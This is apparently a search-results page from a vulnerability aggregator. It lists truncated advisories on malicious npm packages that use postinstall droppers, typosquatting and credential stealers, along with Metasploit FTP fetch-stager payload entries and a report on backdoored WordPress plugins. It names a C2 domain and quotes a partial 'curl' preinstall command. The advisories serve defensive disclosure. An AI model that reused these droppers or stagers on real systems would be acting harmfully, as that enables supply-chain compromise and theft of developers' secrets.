Lucene search
+L

116 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 4 days ago6 views

Malicious code in awesome-terminal (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 379d820ae94a1dd684c187fd2577558795440d8f8cd1fe3cd209c8eb5b303913 [email protected] ships a postinstall script scripts/install-check.cjs that resolves a bundle URL from a remote JSON config at...

6.5AI score
Exploits0References3
Metasploit
Metasploit
added last week33 views

FTP Fetch, Bind TCP Stager (No NX or Win7)

Fetch and execute an x86 payload from an FTP server. Listen for a connection No NX Module Options This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule include Msf::Payload::Adapter::Fetch::FTP inclu...

6.2AI score
Exploits0
Metasploit
Metasploit
added last week13 views

FTP Fetch, Reverse TCP Stager

Fetch and execute an MIPSBE payload from an FTP server. Connect back to the attacker Module Options msf use payload/cmd/linux/ftp/mipsbe/meterpreter/reversetcp msf payloadreversetcp show actions ...actions... msf payloadreversetcp set ACTION msf payloadreversetcp show options ...show and set...

6.2AI score
Exploits0
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/07/08 8:37 p.m.11 views

Malicious code in @vite-js/ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 476576198de86a58304788ac79ac3c8ca21b5029d9e824e3ffab41f539146c3b Package @vite-js/ui impersonates the official vite package: package.json declares author 'Evan You', homepage 'https://vitejs.dev', ships an unmodifi...

6.3AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/07/08 5:31 p.m.10 views

Malicious code in crypto-promiser (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 25594e7865a7525aebefd2f1fcc8060f144bf202b1986875e1cfd95564f66e88 [email protected] is a typosquat of the legitimate crypto-promise package that ships a dropper in its lifecycle scripts. The declared postinstall...

6.6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/30 12:0 a.m.7 views

Malicious code in decimal-format-core (npm)

Malicious npm package published as part of a coordinated DeFi-themed infostealer campaign. decimal-format-core uses a dropper technique: a postinstall hook executes scripts/install-check.cjs at install time, which fetches a second-stage infostealer payload from the C2 domain logstream-api.online...

6.6AI score
Exploits0References9
OSV
OSV
added 2026/06/30 12:0 a.m.5 views

MAL-2026-6689 Malicious code in decimal-format-core (npm)

Malicious npm package published as part of a coordinated DeFi-themed infostealer campaign. decimal-format-core uses a dropper technique: a postinstall hook executes scripts/install-check.cjs at install time, which fetches a second-stage infostealer payload from the C2 domain logstream-api.online...

6.6AI score
Exploits0References9
OSV
OSV
added 2026/06/29 7:18 a.m.5 views

MAL-2026-6587 Malicious code in clob-client-math (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b36bbf14a743630a93ba7f8d7529d3fae8073f0f585af4343506be6248fc1b59 [email protected] ships a postinstall script install-check.cjs that fetches a JSON config from...

6.2AI score
Exploits0References2
OSV
OSV
added 2026/06/29 4:9 a.m.17 views

MAL-2026-6566 Malicious code in date-uuid (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 58dffbe61370f78deed5bacbc8f6bc46a8a989f03da218643a41b52ed025fa6a Package advertised as a UUIDv7 helper, but on require/import it auto-invokes extractDateISO in bootstrap.js, which reads README.md from process.cwd,...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 9:40 p.m.8 views

Malicious code in express-initial (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a8d292a4664135ed1869f907d62fb6472839ab54a59aedb2f3a88022a0c70095 package.json declares "postinstall": "node index.js", so npm install express-initial automatically runs the package's main script. index.js is heavil...

6AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 5:44 p.m.15 views

Malicious code in chai-as-assured (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd28efd7a3d07f87ec22556cc25a8c07117fa4cdd237c6cb1db750c976a11836 chai-as-assured impersonates the popular chai-as-promised package matching README, author, and API surface. When the exported plugin function is...

5.9AI score
Exploits0References3
OSV
OSV
added 2026/06/26 5:44 p.m.9 views

MAL-2026-6532 Malicious code in chai-as-assured (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd28efd7a3d07f87ec22556cc25a8c07117fa4cdd237c6cb1db750c976a11836 chai-as-assured impersonates the popular chai-as-promised package matching README, author, and API surface. When the exported plugin function is...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 4:43 a.m.19 views

Malicious code in anthropic-claude-latest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 39eab369e2498da827d3bbd331effdf24b99ab28961e62da7328e4476e328876 Package anthropic-claude-latest claims to be an 'Official Anthropic Claude SDK wrapper' but ships no Anthropic SDK code; the README is for an unrelat...

6.5AI score
Exploits0References4
OSV
OSV
added 2026/06/23 2:11 p.m.8 views

MAL-2026-6298 Malicious code in ttal2ttml (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 29387ac35a2248ad2e4b287b8c082f8d1a8d03b4937fc84a5b81fb85697e19d4 package.json declares a preinstall lifecycle script that runs node -e "tryrequire'childprocess'.execSync'curl -sf...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 2:11 p.m.11 views

Malicious code in ttal2ttml (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 29387ac35a2248ad2e4b287b8c082f8d1a8d03b4937fc84a5b81fb85697e19d4 package.json declares a preinstall lifecycle script that runs node -e "tryrequire'childprocess'.execSync'curl -sf...

5.8AI score
Exploits0References5
OSV
OSV
added 2026/06/22 6:23 p.m.10 views

MAL-2026-6267 Malicious code in vitest-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 27abcc7f2373309feb253b0cc48b1a8bae7c54a3c43aed0c57add697f4067aba Package name vitest-cli impersonates the official Vitest project while declaring empty author, homepage, repository, and bugs metadata. The...

6AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 6:23 p.m.12 views

Malicious code in vitest-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 27abcc7f2373309feb253b0cc48b1a8bae7c54a3c43aed0c57add697f4067aba Package name vitest-cli impersonates the official Vitest project while declaring empty author, homepage, repository, and bugs metadata. The...

6AI score
Exploits0References6
The Hacker News
The Hacker News
added 2026/06/22 6:0 p.m.11 views

ShapedPlugin WordPress Pro Plugins Backdoored in Supply Chain Attack

Multiple WordPress plugins from ShapedPlugin were compromised in a supply chain attack after unknown threat actors managed to tamper with the official release channels and push backdoor code. "Attackers compromised the vendor's build and distribution pipeline, injecting backdoor code into Pro...

7.5CVSS6.2AI score0.00387EPSS
Exploits1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.15 views

Malicious code in @glitchpad/throttler (npm)

@glitchpad/throttler malicious version 2.2.3, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...

5.9AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/22 12:0 p.m.16 views

Malicious code in @zynkit/jwtbytes (npm)

@zynkit/jwtbytes malicious version 0.5.3, published by [email protected] is a trojanized npm package belonging to the wshu.net credential-stealer campaign. The campaign published trojanized look-alike utility packages across 12+ scopes whose publisher accounts all follow the pattern...

6.5AI score
Exploits0References7
Rows per page
Query Builder